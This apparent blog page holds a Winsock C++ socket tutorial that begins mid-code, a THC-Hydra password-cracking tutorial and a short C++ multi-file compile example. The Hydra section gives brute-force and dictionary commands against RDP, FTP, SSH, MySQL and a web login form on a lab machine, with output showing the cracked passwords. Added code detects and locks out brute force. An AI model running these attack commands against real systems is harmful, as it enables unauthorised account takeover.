    int what=WSAStartup(mkword,&version);
    if(what!=0){
        std::cout<<"This version is not supported! - \n"<<WSAGetLastError()<<std::endl;
    }
    else{
        std::cout<<"Good - Everything fine!\n"<<std::endl;
    }

    SOCKET u_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); //IPv4, stream socket, TCP
    if(u_sock==INVALID_SOCKET)
        std::cout<<"Creating socket fail\n";

    else
        std::cout<<"It was okay to create the socket\n";

    return 0;
}

Our second step is creating the socket. So in line 17 we declare a variable of type SOCKET called u_sock and store the return value of socket() in it.

AF_INET specifies IPv4.

SOCK_STREAM specifies a connection-based, reliable two-way byte stream, which with AF_INET means TCP.

IPPROTO_TCP specifies the transport protocol, TCP.

You can get more details at this link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms740506%28v=vs.85%29.aspx .

If something goes wrong creating the socket then it returns the value INVALID_SOCKET, which we check in line 18.




Time to specify the address and make the connection. For a bit of theory and the basic idea read: http://msdn.microsoft.com/en-us/library/windows/desktop/ms740496%28v=vs.85%29.aspx and, for the connect() function, http://msdn.microsoft.com/en-us/library/windows/desktop/ms737625%28v=vs.85%29.aspx.

The code for the address information and the connect() call:


#include <iostream>
#include <winsock2.h>


int main()
{
    WSAData version;                 //Receives details of the winsock implementation.
    WORD mkword=MAKEWORD(2,2);       //We ask for winsock version 2.2.
    int what=WSAStartup(mkword,&version);
    if(what!=0){
        std::cout<<"This version is not supported! - \n"<<WSAGetLastError()<<std::endl;
    }
    else{
        std::cout<<"Good - Everything fine!\n"<<std::endl;
    }

    SOCKET u_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); //IPv4, stream socket, TCP
    if(u_sock==INVALID_SOCKET)
        std::cout<<"Creating socket fail\n";

    else
        std::cout<<"It was okay to create the socket\n";

    //Socket address information
    sockaddr_in addr={};                         //zero-initialised, so unused fields are not garbage
    addr.sin_family=AF_INET;
    addr.sin_addr.s_addr=inet_addr("192.168.206.1");
    addr.sin_port=htons(80);                     //htons(): the port in network byte order
    /*==========Addressing finished==========*/

    //Now we connect
    int conn=connect(u_sock,(SOCKADDR*)&addr,sizeof(addr));
    if(conn==SOCKET_ERROR){
        std::cout<<"Error - when connecting "<<WSAGetLastError()<<std::endl;
        closesocket(u_sock);
        WSACleanup(); return 1;                  //stop here: nothing below may use the closed socket
    }


    return 0;
}

In the above example, in line 25 we declare the address object to work with. Then in line 26 we specify IPv4, in line 27 we set the target address to connect to, and in line 28 we set the port number.

Line 32 declares an int variable and stores the return value of connect() for checking afterwards. The parameters: u_sock is the socket we created in line 17, (SOCKADDR*)&addr is the address information cast to a generic SOCKADDR pointer, and sizeof(addr) is the length of that address structure.

Lines 33 to 36 check whether anything went wrong: connect() returns SOCKET_ERROR when it is unsuccessful. If so we print the error code, close the socket using closesocket() and call WSACleanup().

Assuming everything went fine, we are almost done. But without getting some data back from the remote host you may feel something is missing. So let's use two more functions, send() and recv(). With send() we send whatever we want to the remote host, and with recv() we store the reply in an array:


#include <iostream>
#include <winsock2.h>
#include <cstring>                               //for strlen()



int main()
{
    WSAData version;                 //Receives details of the winsock implementation.
    WORD mkword=MAKEWORD(2,2);       //We ask for winsock version 2.2.
    int what=WSAStartup(mkword,&version);
    if(what!=0){
        std::cout<<"This version is not supported! - \n"<<WSAGetLastError()<<std::endl;
    }
    else{
        std::cout<<"Good - Everything fine!\n"<<std::endl;
    }

    SOCKET u_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); //IPv4, stream socket, TCP
    if(u_sock==INVALID_SOCKET)
        std::cout<<"Creating socket fail\n";

    else
        std::cout<<"It was okay to create the socket\n";

    //Socket address information
    sockaddr_in addr={};                         //zero-initialised, so unused fields are not garbage
    addr.sin_family=AF_INET;
    addr.sin_addr.s_addr=inet_addr("192.168.206.1");
    addr.sin_port=htons(80);                     //htons(): the port in network byte order
    /*==========Addressing finished==========*/

    //Now we connect
    int conn=connect(u_sock,(SOCKADDR*)&addr,sizeof(addr));
    if(conn==SOCKET_ERROR){
        std::cout<<"Error - when connecting "<<WSAGetLastError()<<std::endl;
        closesocket(u_sock);
        WSACleanup(); return 1;                  //stop here: nothing below may use the closed socket
    }

    //Send some message to remote host
    const char *mymsg="GET / HTTP/1.1\r\n\r\n";  //the request (HTTP/1.1 servers usually also expect a Host: header)
    char vect[512]={0};                          //zero-filled, so a short reply is already NUL-terminated

    int smsg=send(u_sock,mymsg,(int)strlen(mymsg),0); //strlen(): sizeof(mymsg) would be the size of the pointer, not of the request
    if(smsg==SOCKET_ERROR){
        std::cout<<"Error: "<<WSAGetLastError()<<std::endl;
        closesocket(u_sock); WSACleanup(); return 1;
    }

    int get=recv(u_sock,vect,(int)sizeof(vect)-1,0); //one byte is kept free for the terminating '\0'
    if(get==SOCKET_ERROR){
        std::cout<<"Error in Receiving: "<<WSAGetLastError()<<std::endl;
    }
    std::cout<<vect<<std::endl;
    closesocket(u_sock); WSACleanup();
    return 0;
}

In line 42 we define the string to send to the remote address. Line 43 declares an array to hold the reply.

In line 45 we store the return value of send(), called with the required parameters: u_sock is the socket we created, mymsg holds the request to send to the remote address, then the length of the request in bytes, and finally the flags.

In line 51 we use recv() to get the reply and store it in the array. The parameters of this function are the same as for send(): the socket, the buffer, the buffer length and the flags.

Line 55 prints the contents of the array on the screen, and line 56 closes the socket.
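Three things in the send()/recv() step deserve a closer look: sizeof() of a char pointer is the size of the pointer, not of the request; a single recv() may return only part of the reply; and a buffer filled to its last byte has no terminating '\0' for std::cout. The added example below (my code, not from the original post) shows the same step done carefully in plain C, without Winsock, so it compiles anywhere: build_get_request() returns the exact byte count to hand to send(), and read_response() keeps calling a recv()-shaped reader until the peer closes or the buffer is full, always leaving the buffer NUL-terminated. The reader here is a constructed stand-in (fake_recv) that returns a canned reply in 7-byte chunks; on Windows you would pass a thin wrapper around recv() instead. All names and the sample reply are my own.

```c
#include <stdio.h>
#include <string.h>

/* Builds a minimal HTTP/1.1 request into buf. Returns the number of bytes to
 * pass to send() (the real length, not sizeof a pointer), or -1 if it does
 * not fit. Hypothetical helper, not part of any library. */
int build_get_request(char *buf, size_t buflen, const char *host, const char *path)
{
    int n = snprintf(buf, buflen,
                     "GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n",
                     path, host);
    if (n < 0 || (size_t)n >= buflen)
        return -1;                       /* truncated: refuse to send a broken request */
    return n;
}

/* A reader with recv()'s shape: bytes read, 0 at end of stream, -1 on error. */
typedef int (*read_fn)(void *ctx, char *buf, int len);

/* Reads until the peer closes, the buffer is full, or an error occurs.
 * Always leaves buf NUL-terminated. Returns total bytes stored, or -1. */
int read_response(read_fn rd, void *ctx, char *buf, size_t buflen)
{
    size_t total = 0;
    if (buflen == 0)
        return -1;
    while (total < buflen - 1) {         /* keep one byte for the '\0' */
        int n = rd(ctx, buf + total, (int)(buflen - 1 - total));
        if (n < 0) { buf[total] = '\0'; return -1; }
        if (n == 0) break;               /* end of stream */
        total += (size_t)n;              /* partial reads simply accumulate */
    }
    buf[total] = '\0';
    return (int)total;
}

/* Constructed stand-in for a socket: hands out a canned reply in small
 * chunks, the way recv() returns partial data. */
struct fake_peer { const char *data; size_t len, pos, chunk; };

int fake_recv(void *ctx, char *buf, int len)
{
    struct fake_peer *p = ctx;
    size_t n = p->len - p->pos;
    if (n == 0) return 0;                /* peer closed the connection */
    if (n > p->chunk) n = p->chunk;
    if (n > (size_t)len) n = (size_t)len;
    memcpy(buf, p->data + p->pos, n);
    p->pos += n;
    return (int)n;
}

/* Drives read_response() against the fake peer; returns the bytes received. */
int demo(char *out, size_t outlen)
{
    static const char reply[] = "HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello";
    struct fake_peer peer = { reply, sizeof(reply) - 1, 0, 7 };
    return read_response(fake_recv, &peer, out, outlen);
}

int main(void)
{
    char req[128], out[512];
    int n = build_get_request(req, sizeof(req), "example.test", "/");
    printf("request is %d bytes\n", n);
    n = demo(out, sizeof(out));
    printf("received %d bytes:\n%s\n", n, out);
    return 0;
}
```

Passing a small buffer to demo() shows the other edge: the reply is cut off at outlen-1 bytes and is still a valid C string, instead of running into whatever lies past the array.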




I hope I made this article simple to understand. I don't really like to write too much theory, since there is a lot of it and it is not that useful to me (maybe to you too). If you have any questions, please comment!


Hope you enjoyed!





 



Brute force attack & dictionary password cracking using hydra

Brute force attacks and dictionary password cracking attacks are still effective. A brute force attack can be more effective if the hacker has good knowledge of password profiling and information gathering. Today I will briefly explain how a hacker can crack passwords using hydra with a brute force attack or a dictionary attack. Before that let me give you a short definition of brute force and dictionary attacks.


Brute force attack

A brute force attack tries every combination of the characters a-z, A-Z, 0-9 and other special characters.


Dictionary password attack

A dictionary attack uses a list of common passwords. For example, you know that "admin" is used as a password to protect various confidential resources, so you put the word "admin" in your dictionary file. You can also download free password lists from various sources (Google search!). If the hacker is lucky then the password will be in the list.



I will explain how a hacker can make a brute force attack using hydra to crack various online accounts.

Brute Force Attack

If hackers decide to do a pure brute force attack then they need to drop the option '-P' and use '-x min:max:charset', for example '-x 3:3:a':


root@find:~/Desktop# hydra -t 10 -V -f -l root -x 4:6:a ftp://192.168.67.132


The hydra syntax:
-t = how many parallel attempts at a time (1/5/10/100?). Don't use too many, otherwise you will get false results
-V = show each attempt
-f = stop when the password is found
-l = the username (-L to read usernames from a file)
-P = dictionary file
IP-address-or-domain module-such-as-http-form = the target, followed by the service module


Cracking the RDP password

We know the default username on Windows is "administrator", so we only need to brute force the password:

root@find:~/Desktop# hydra -t 1 -V -f -l administrator -P common.txt rdp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:24:21
[DATA] 1 task, 1 server, 933 login tries (l:1/p:933), ~933 tries per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Admin" - 1 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Administration" - 2 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "crm" - 3 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CVS" - 4 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS" - 5 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS25" - 6 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS31" - 7 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "INSTALL_admin" - 8 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Log" - 9 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Logs" - 10 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Pages" - 11 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "youradmin" - 12 of 933 [child 0]
[3389][rdp] host: 192.168.67.132 login: administrator password: youradmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:24:46

I did it on VMware Workstation and it was too slow!



Cracking FTP password

The hacker knows the username of the FTP account is 'root', so the hacker makes a quick password guessing run with the following command:

root@find:~/Desktop#hydra -t 5 -V -f -l root -P common.txt ftp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:45:55
[DATA] 5 tasks, 1 server, 934 login tries (l:1/p:934), ~186 tries per task
[DATA] attacking service ftp on port 21
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Admin" - 1 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Administration" - 2 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "crm" - 3 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CVS" - 4 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS" - 5 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS25" - 6 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS31" - 7 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "INSTALL_admin" - 8 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Log" - 9 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Logs" - 10 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Pages" - 11 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "youradmin" - 12 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "ftpadmin" - 13 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlet" - 14 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlets" - 15 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "SiteServer" - 16 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Sources" - 17 of 934 [child 0]
[21][ftp] host: 192.168.67.132 login: root password: ftpadmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:45:55
root@find:~/Desktop#

Here the password is ftpadmin!

root@find:~/Desktop#ftp 192.168.67.132
Connected to 192.168.67.132.
220 Hello, I'm freeFTPd 1.0
Name (192.168.67.132:root): root
331 Password required for root
Password:
230 User root logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection
drwxr-xr-x 1 root root 0 Jan 7 13:39 .
drwxr-xr-x 1 root root 0 Jan 7 13:39 ..
226 Directory send OK



Cracking SSH password with hydra


root@find:~/Desktop#hydra -t 5 -V -f -l root -P common.txt localhost ssh
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:11:56
[DATA] 5 tasks, 1 server, 935 login tries (l:1/p:935), ~187 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target localhost - login "root" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS" - 5 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS25" - 6 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS31" - 7 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "INSTALL_admin" - 8 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "Log" - 9 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "sshfuck" - 10 of 935 [child 0]
[22][ssh] host: 127.0.0.1 login: root password: sshfuck
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:11:58




MySQL password cracking using hydra


In this case we are going to crack an empty MySQL password. Some people still do not use a password to protect their database server. We can make a brute force attack like this:

root@find:~/Desktop#hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:18:16
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] 4 tasks, 1 server, 937 login tries (l:1/p:937), ~234 tries per task
[DATA] attacking service mysql on port 3306
[ATTEMPT] target localhost - login "root" - pass "root" - 1 of 937 [child 0]
[ATTEMPT] target localhost - login "root" - pass "" - 2 of 937 [child 1]
[ATTEMPT] target localhost - login "root" - pass "Admin" - 3 of 937 [child 2]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 4 of 937 [child 3]
[3306][mysql] host: 127.0.0.1 login: root password:
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:18:16

Pay attention to the hydra option -e ns: it additionally tries an empty password (n) and the login name itself as the password (s), which is how the blank root password was found on the second attempt.
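Every run above leaves a very recognisable trace on the target: many failed logins for one account from one address within a few seconds. As an added example (my code, not from the original post), here is the defender's side of this: a small C program that scans OpenSSH-style "Failed password" lines and flags any source address that exceeds a threshold of failures inside a time window. The log lines are constructed for this example (host name, PIDs and addresses are made up); the function and struct names are my own. In practice the same rule is what fail2ban applies to auth.log, and sshd's MaxAuthTries limits attempts per connection, but the logic is the same.

```c
#include <stdio.h>
#include <string.h>

#define MAX_SOURCES 16
#define IP_LEN 46

/* Constructed sample log in the shape of OpenSSH auth.log lines; the host,
 * PIDs and addresses are made up for this example. */
static const char *sample_log[] = {
    "Jan  7 14:11:56 host sshd[2301]: Failed password for root from 10.0.0.5 port 50112 ssh2",
    "Jan  7 14:11:56 host sshd[2303]: Failed password for root from 10.0.0.5 port 50113 ssh2",
    "Jan  7 14:11:57 host sshd[2305]: Failed password for root from 10.0.0.5 port 50114 ssh2",
    "Jan  7 14:11:57 host sshd[2307]: Failed password for invalid user admin from 10.0.0.9 port 40211 ssh2",
    "Jan  7 14:11:57 host sshd[2309]: Failed password for root from 10.0.0.5 port 50115 ssh2",
    "Jan  7 14:11:58 host sshd[2311]: Failed password for root from 10.0.0.5 port 50116 ssh2",
    "Jan  7 14:12:01 host sshd[2313]: Accepted password for alice from 10.0.0.9 port 40212 ssh2",
    "Jan  7 14:12:03 host sshd[2315]: Failed password for root from 10.0.0.5 port 50117 ssh2",
    "Jan  7 14:20:15 host sshd[2401]: Failed password for bob from 10.0.0.9 port 40300 ssh2",
};

struct source {
    char ip[IP_LEN];
    int failures;
    long first, last;   /* seconds since midnight of first/last failure in the window */
};

/* Seconds since midnight from the "hh:mm:ss" at the fixed syslog offset 7.
 * Returns -1 if the timestamp is malformed. */
static long line_seconds(const char *line)
{
    int h, m, s;
    if (strlen(line) < 15 || sscanf(line + 7, "%2d:%2d:%2d", &h, &m, &s) != 3)
        return -1;
    return h * 3600L + m * 60L + s;
}

/* Copies the address that follows " from " into ip. Returns 1 on success. */
static int line_source(const char *line, char *ip, size_t iplen)
{
    const char *p = strstr(line, " from ");
    size_t n;
    if (p == NULL) return 0;
    p += 6;
    n = strcspn(p, " ");                 /* the address ends at the next space */
    if (n == 0 || n >= iplen) return 0;  /* bounded copy: never overflow ip */
    memcpy(ip, p, n);
    ip[n] = '\0';
    return 1;
}

/* Scans the lines and returns how many source addresses produced at least
 * `threshold` failed logins within `window` seconds; the flagged addresses
 * are written to out[0..ret-1]. The window restarts when the earlier
 * failures have aged out, which is enough for a burst detector. */
int detect_bruteforce(const char **lines, size_t nlines, int threshold,
                      long window, char out[][IP_LEN], size_t maxout)
{
    struct source table[MAX_SOURCES];
    size_t nsrc = 0, i, j, nflag = 0;

    for (i = 0; i < nlines; i++) {
        char ip[IP_LEN];
        long t;
        if (strstr(lines[i], "Failed password") == NULL) continue;  /* successes are ignored */
        if (!line_source(lines[i], ip, sizeof(ip))) continue;
        if ((t = line_seconds(lines[i])) < 0) continue;

        for (j = 0; j < nsrc && strcmp(table[j].ip, ip) != 0; j++)
            ;
        if (j == nsrc) {
            if (nsrc == MAX_SOURCES) continue;   /* table full: skip rather than overflow */
            strcpy(table[nsrc].ip, ip);          /* ip is shorter than IP_LEN by construction */
            table[nsrc].failures = 0;
            table[nsrc].first = t;
            nsrc++;
        }
        if (t - table[j].first > window) {       /* old failures aged out: start a new window */
            table[j].first = t;
            table[j].failures = 0;
        }
        table[j].last = t;
        table[j].failures++;
    }
    for (j = 0; j < nsrc && nflag < maxout; j++)
        if (table[j].failures >= threshold && table[j].last - table[j].first <= window)
            strcpy(out[nflag++], table[j].ip);
    return (int)nflag;
}

/* Runs the detector over the constructed sample: 5 failures within 60 s. */
int demo_flag_count(char out[][IP_LEN], size_t maxout)
{
    return detect_bruteforce(sample_log, sizeof(sample_log) / sizeof(sample_log[0]),
                             5, 60, out, maxout);
}

int main(void)
{
    char flagged[MAX_SOURCES][IP_LEN];
    int n = demo_flag_count(flagged, MAX_SOURCES), i;
    for (i = 0; i < n; i++)
        printf("possible brute force from %s\n", flagged[i]);
    return 0;
}
```

With the sample above only 10.0.0.5 is reported: it fails six times in seven seconds, while 10.0.0.9 has two failures eight minutes apart and one successful login, which the rule correctly leaves alone.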



Web Form brute forcing


I have coded a simple HTML login form for this test. Hydra can brute force web forms faster and more effectively than other tools, but it requires you to understand how the form is handled. So the hacker needs a basic understanding of HTML too. Also the hacker (or you) needs to find out the correct username; otherwise it will fail, or the username will also need to be brute forced, which is a really bad idea.

The login form:

<html>
<head>
<title>Admin Login</title>
</head>

<body>
<center>
<h1>Administrator Login</h1>
<form action="log.php" method="post">
Username:<input type="text" name="user" placeholder="admin"><br>
Password:<input type="password" name="password" placeholder="password"><br>
<input type="submit" name="submit" value="submit">
</form>
</center>

</body>
</html>


We actually need to brute force the field name="password". "password" is the name of the password field, which needs to match a string from the database or a string hard coded in PHP. For your better understanding I am pasting log.php too:

<?php

$pass="yourpass";   // the hard coded password for this test

$passGet=isset($_POST["password"]) ? $_POST["password"] : "";   // what was sent in the "password" field

if($passGet==$pass){
echo "success!";    // the string hydra will look for
echo "<br>";
}

else{
echo "fail";
}


?>

In the PHP code, $passGet=$_POST["password"]; reads the field sent by the POST method and compares it with the variable $pass. If you enter yourpass in the password field then it will say success, otherwise fail.

Imagine we don't know the password, so we are going to brute force it using hydra. We have the following information:

URL: http://localhost/login/ (optional?)
Action page: http://localhost/login/log.php (required)
User: admin
Form parameters: user=admin&password=brute-force-here (see the HTML!)

Let us now brute force the password using thc-hydra.

Hydra command 1:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

Here is output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:08:07
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 1]
[80][www-form] host: 192.168.206.1 login: admin password: yourpass
1 of 1 target successfully completed, 1 valid password found


Let's break down "/login/log.php:user=^USER^&password=^PASS^:S=success":

/login/ = path
log.php = action page
user = first parameter
^USER^ = use the strings from -l or -L
password = second parameter
^PASS^ = use the strings from -p or -P (usually a dictionary file, or the -x option for brute force)
S=success = when hydra sees the "success" message from the action page it stops, meaning the password was successfully cracked!
This is really important. If it is set wrong, hydra will give false positives. So be careful!
 

Hydra command 2:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"

Output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:38:28
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 2]
[80][www-form] host: 192.168.206.1 login: admin password: yourpass
1 of 1 target successfully completed, 1 valid password found


In this command we brute forced the page with the fail string. When a bad password is entered, the page generates the "fail" message. So we tell thc-hydra to keep attacking as long as it sees the message "fail"; hydra won't stop until it gets a response without "fail" in it. But be careful: if the success page contains the string "fail" somewhere, hydra will give you false results. It depends on the situation! For example, a success page might have the following welcome message:

Welcome User! We are not responsible if you are fail to protect your confidential information. Be careful from hacker!

In this case hydra will give a false result. So think about how you want to set the fail string!



Some tips against brute force:
1. Use strong passwords.
2. The login page should have a captcha.
3. The server should count failed attempts and block the IP after a few failed logins.
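Tip 3 as working code, added here as an example and not code from the original post: a server-side counter that sits in front of the password comparison in log.php and refuses further attempts once an IP or an account has failed too often. The class and constant names are this example's own, and the credential store is constructed for the demo.

```python
"""Server-side lockout for the login form in log.php (tip 3 above).

Added example, not code from the original post: it models the check that
would run before the password comparison. Class and constant names are this
example's own, and the credential store below is constructed for the demo.
"""
import time
from collections import defaultdict, deque

MAX_FAILURES = 5        # failures inside the window that trigger a lockout
WINDOW_SECONDS = 60     # sliding window over which failures are counted
LOCKOUT_SECONDS = 300   # how long a locked IP or account stays blocked

# Stands in for $pass in the PHP snippet; a real app stores a salted hash.
CREDENTIALS = {"admin": "yourpass"}


class LoginGuard:
    """Counts failures per client IP and per account; refuses both once the limit is hit."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock                  # injectable for testing
        self.failures = defaultdict(deque)  # key -> timestamps of recent failures
        self.locked_until = {}              # key -> monotonic time the lock expires

    def _prune(self, key, now):
        """Drop failures older than the window so old noise does not lock anyone out."""
        q = self.failures[key]
        while q and now - q[0] > WINDOW_SECONDS:
            q.popleft()

    def is_locked(self, key):
        until = self.locked_until.get(key)
        if until is None:
            return False
        if self.clock() >= until:           # lock expired: forget it and start clean
            del self.locked_until[key]
            self.failures[key].clear()
            return False
        return True

    def record_failure(self, key):
        now = self.clock()
        self._prune(key, now)
        self.failures[key].append(now)
        if len(self.failures[key]) >= MAX_FAILURES:
            self.locked_until[key] = now + LOCKOUT_SECONDS

    def attempt(self, ip, user, password):
        """Return (status, body). A locked IP or account is refused before the password
        is compared, so a correct guess made during the lockout never yields "success"
        and hydra's S=success match has nothing to fire on."""
        keys = (("ip", ip), ("user", user))
        if any(self.is_locked(k) for k in keys):
            return "locked", "too many failed attempts, try again later"
        if CREDENTIALS.get(user) == password:
            for k in keys:
                self.failures[k].clear()
            return "success", "success!"
        for k in keys:
            self.record_failure(k)
        return "fail", "fail"
```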



Hope you enjoyed!

Compiling c++ multiple sources file

Compiling multiple C++ source files with g++ is easy, but it requires a little manual work. Compiling multiple source files can be easier and more straightforward with a makefile, but I will only give a simple example here. If you think you need an example makefile too, you can search Google or write a comment and I will update this post!

I hope you already understand the basics of C++, like functions, classes, etc.

C++ source file one


#include <iostream>
#include "hell.h"

void testing() {
    std::cout << "Test\n";
    testing1();   // defined in the second source file, declared in hell.h
}

int main() {
    std::cout << "Test\n";
    testing();

    return 0;
}



C++ source file two


#include "hell.h"

void testing1() {
    Test tt;              // object of the class declared in hell.h
    tt.t = "LALA";
    std::cout << "Hello world 2\n" << tt.t << std::endl;
    tt.h();
}

void Test::h() {          // definition of the method declared in class Test
    std::cout << "C++ method\n";
}
 
 
 

tt is an object of the class called "Test".
t is a member variable declared in the header file, so tt.t means "use the variable t from class Test!".
You can write any valid code in the function or in the C++ class method!

